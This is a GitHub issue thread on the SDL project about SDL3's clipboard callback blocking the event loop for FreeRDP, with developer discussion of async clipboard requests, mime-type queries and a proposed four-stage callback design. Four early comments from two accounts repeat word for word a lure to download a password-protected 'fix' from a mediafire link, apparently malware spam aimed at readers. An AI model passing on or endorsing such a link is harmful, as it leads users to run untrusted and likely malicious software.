### ISSUE TITLE
Clipboard async operation blocking

### ISSUE THREAD

**Issue by akallabeth** [libsdl-org/SDL#10598]
Hi!

Trying to use SDL3 for https://github.com/FreeRDP/FreeRDP/ and so far working quite well.
We´re facing an issue with the clipboard `API` though:

1. Some new data is put into the clipboard on the remote end
2. Locally we use `SDL_SetClipboardData` to announce the new data
3. on a local Paste now the callback is called from the `SDL` thread
4. Since the operation might take a lot of time (the data needs to be transferred over the wire) the whole application blocks until the data is transferred.

so, maybe we´re missing something or this is a design issue?

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hardening** [comment]
Hi, I may add more context: the thing is that to treat the clipboard content retrieval we need to have the SDL loop active to treat incoming RDP packets, but we're stuck in the callback for clipboard data.

**Comment by hardening** [comment]
@slouken well just have some code that depends on the SDL loop in the clipboard callback

**Comment by slouken** [comment]
Example? Or FreeRDP build and test instructions?

**Comment by slouken** [comment]
Does it happen even locally?

**Comment by akallabeth** [comment]
@slouken yes, it is a simple deadlock:
1. The callback is called from the SDL loop
2. to synthesize the data something else is required that needs the `SDL loop` to run once more
3. you will wait eternally

**Comment by hardening** [comment]
@slouken perhaps I can give more context: the clipboard channel of RDP has 2 operations one where the remote part announce some available data in let's say `text/html`, so in this case we call `SDL_SetClipboardData` to notify the OS that we have html data available. As SDL callback we set a function that will use the second operation that requests the corresponding data to the server. The point is that to treat that server's response we can't stay in the clipboard's callback, we need to go back to the SDL loop to treat the incoming RDP packets.

So as said @akallabeth you can't do anything that relies on the SDL loop from the clipboard data callback

**Comment by slouken** [comment]
On Windows the clipboard callback is called immediately, though you should be able to recursively call the SDL event loop and so forth. Because of that behavior it sounds like you want to request the clipboard data when the remote announces it's available and then once it's available locally, set the local clipboard.

**Comment by slouken** [comment]
On Linux, you do get async clipboard requests, but they're not truly async, they are called when processing window messages, and the data needs to be available from within the callback at that time. I'm not sure how you're expecting a callback to return to your main loop for the data even in that case?

**Comment by hardening** [comment]
Let's give some more details on our case and few things that are bothering (running on X11) :
1. we receive a notification from the remote RDP server that text/plain is available on the server, so we call `SDL_SetClipboardData` with our callback, that makes a `SDL_EVENT_CLIPBOARD_UPDATE` event posted;
2. at next loop turn, we enter our treatment for local clipboard updated. Like if some other app would have updated the clipboard, but in that case, the source of the update is us. So in this treatment we prepare a request to notify the server about the new mime types available (in RDP you propose some formats and if interested the peer can request the associated data). When looking at what kind of data is in the clipboard via SDL like for instance by calling `SDL_HasClipboardText()` we endup with having the callback registered in step 1 called.

So it would be really nice if there was a function that was returning the available mime types for the clipboard but without any synthesizing. I would use that in step 2 to just announce what types are available locally.
Also I was not expecting `SDL_HasClipboardText` to do calls in back as it really looks just like a getter. Perhaps we could assume that as soon as the mime type has been notified, then `SDL_HasClipboardXXX` would return true even if it could fail when calling `SDL_GetClipboardXXX` as this second function involve doing the synthesizing.

**Comment by 2fly2** [comment]
> Let's give some more details on our case and few things that are bothering (running on X11) :
> 
> 1. we receive a notification from the remote RDP server that text/plain is available on the server, so we call `SDL_SetClipboardData` with our callback, that makes a `SDL_EVENT_CLIPBOARD_UPDATE` event posted;
> 2. at next loop turn, we enter our treatment for local clipboard updated. Like if some other app would have updated the clipboard, but in that case, the source of the update is us. So in this treatment we prepare a request to notify the server about the new mime types available (in RDP you propose some formats and if interested the peer can request the associated data). When looking at what kind of data is in the clipboard via SDL like for instance by calling `SDL_HasClipboardText()` we endup with having the callback registered in step 1 called.
> 
> So it would be really nice if there was a function that was returning the available mime types for the clipboard but without any synthesizing. I would use that in step 2 to just announce what types are available locally. Also I was not expecting `SDL_HasClipboardText` to do calls in back as it really looks just like a getter. Perhaps we could assume that as soon as the mime type has been notified, then `SDL_HasClipboardXXX` would return true even if it could fail when calling `SDL_GetClipboardXXX` as this second function involve doing the synthesizing.


In SDL3 X11 clipboard, when checking if a certain format is present, it calls the interface to get the data for that format and then checks if the data is empty, instead of directly querying which formats are currently available. I believe this is an area that needs optimization.

SDL_bool X11_HasClipboardData(SDL_VideoDevice *_this, const char *mime_type)
{
    size_t length;
    void *data;
    data = X11_GetClipboardData(_this, mime_type, &length);
    if (data) {
        SDL_free(data);
    }
    return length > 0;
}

**Comment by hardening** [comment]
More on that, so I've pushed https://github.com/libsdl-org/SDL/pull/10962 that was supposed to improve the situation for the clipboard in `FreeRDP`, but in fact it doesn't help that much (because the announced mime types by `SDL_GetClipboardMimeTypes` aren't synchronized when it's an external clipboard update).

The big concern with the clipboard in SDL is that there's a mix between external clipboard update and internal one, it's even more confusing with the `SDL_SetClipboardData` callback. When you have to treat a `SDL_ClipboardEvent` in the SDL loop there's no good way to know if it's because it comes from the system(external) or it's an internal update. Even more problematic in FreeRDP (to avoid multiple clipboard update notifications), when you `SDL_SetClipboardData`, you'll receive a first internal notification, but usually a second one when the clipboard is effectively updated on the system (at least on X11).

To treat that spurious notifications I'm seeing 2 possibilities:

1. add the current available mime_types in `SDL_ClipboardEvent` so that at least even if we receive "spurious" notifications, we're safe about the effectively available data. And so possibly remove `SDL_GetClipboardMimeTypes` ;
2. update the backends so that the mime_types in `SDL_VideoDevice` are up to date when an external update happens and so `SDL_GetClipboardMimeTypes` would always be accurate

Could be both. Any opinion ?

**Comment by slouken** [comment]
I'm going to move this to the 3.2.0 milestone, since the proposed solution is not an ABI breaking change.

**Comment by akallabeth** [comment]
might also be a good idea to have some kind of identification of the last update (e.g. a timestamp?) and source (SDL or system)

consider that an update happens and all `mime types` stay the same, there is currently no way except to compare the data to know if something actually changed content wise (and not only just some other event that triggered the update not related to contents)

**Comment by slouken** [comment]
I believe this is fixed with the merging of https://github.com/libsdl-org/SDL/pull/11037, please let us know if there's something more that needs to be done here.

**Comment by akallabeth** [comment]
@slouken sorry to be late here, but the solution of @hardening was just to allow identification of an update.
this issue was about `SDL_ClipboardDataCallback` being blocking and there is no way to do something while waiting for the data to arrive.

**Comment by akallabeth** [comment]
so, to clarify, there should be 4 entry points for each clipboard operation:
1. register the availability
2. a request to generate the data
3. the request completion
4. a request abort handler

currently the `request to generate the data` and `request completion` are in the same (blocking) callback
